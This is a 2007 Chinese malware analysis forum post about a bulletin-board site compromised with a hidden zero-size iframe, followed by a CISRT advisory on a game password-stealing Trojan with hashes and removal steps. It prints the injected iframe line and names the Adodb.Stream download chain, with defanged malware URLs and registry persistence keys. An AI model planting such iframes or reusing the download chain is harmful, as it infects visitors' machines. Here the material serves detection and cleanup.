單純僦昰緈諨 - 2007-1-29 19:38:00
hxxp://bbs.milchina.com/ (218.92.120.58)
代码在网页底部:
<iframe src='hxxp://ujdmk1.chinaw3.com/xx.html' width='0' height='0' scrolling='no'
frameborder='0'></iframe>
hxxp://ujdmk1.chinaw3.com/xx.html (218.30.100.32)
还原一次:
利用Adodb.Stream漏洞下载到本机更名haotian.bat
hxxp://ujdmk1.chinaw3.com/tufei.exe
加壳方式:UPolyX v0.5 [Overlay] *
编译语言:VB5.0
文件大小:5,389 字节
CRC32:78C808A6
MD5:2D4DC09E85DEA63E53918118B7581316
BD报毒为:Trojan.Downloader.VB.VX
生成:
wdfmgr32.exe
software\microsoft\windows\currentversion\run
.log="wdfmgr32.exe"
tpxdwn.dll(DL)
下载的东东处理方法:
附录:CISRT
【CISRT2006043】木马 svhost32.exe xydll.dll 解决方案
原贴:http://www.cisrt.org/bbs/redirect.php?fid=12&tid=360&goto=nextnewset
档案编号:CISRT2006043
病毒名称:Trojan-PSW.Win32.Delf.ns(Kaspersky)
病毒别名:
病毒大小:27,806 字节
加壳方式:Upack
样本MD5:46cb679780591eb8f74c87915eb103cc
样本SHA1:51d0f3534031451a4171acd64d74d42cd28453ff
发现时间:2006.09
更新时间:2006.09
关联病毒:
传播方式:通过恶意网页传播、其它木马下载
技术分析
==========
这个木马应该是梦幻西游木马,主程序使用的是“记事本”程序图标,原文件名mhh.exe,运行后复制自身到系统目录:%WINDOWS%\Download\svhost32.exe,释放文件:%System%\xydll.dll注入其它进程。
创建启动项:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xy"="%WINDOWS%\Download\svhost32.exe"
清除步骤
==========
1. 结束%WINDOWS%\Download\svhost32.exe进程
2. 删除病毒文件:
%WINDOWS%\Download\svhost32.exe
3. 删除启动项:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"xy"="%WINDOWS%\Download\svhost32.exe"
4. 重新启动计算机
5. 删除病毒文件:
%System%\xydll.dll
© 2000 - 2026 Rising Corp. Ltd.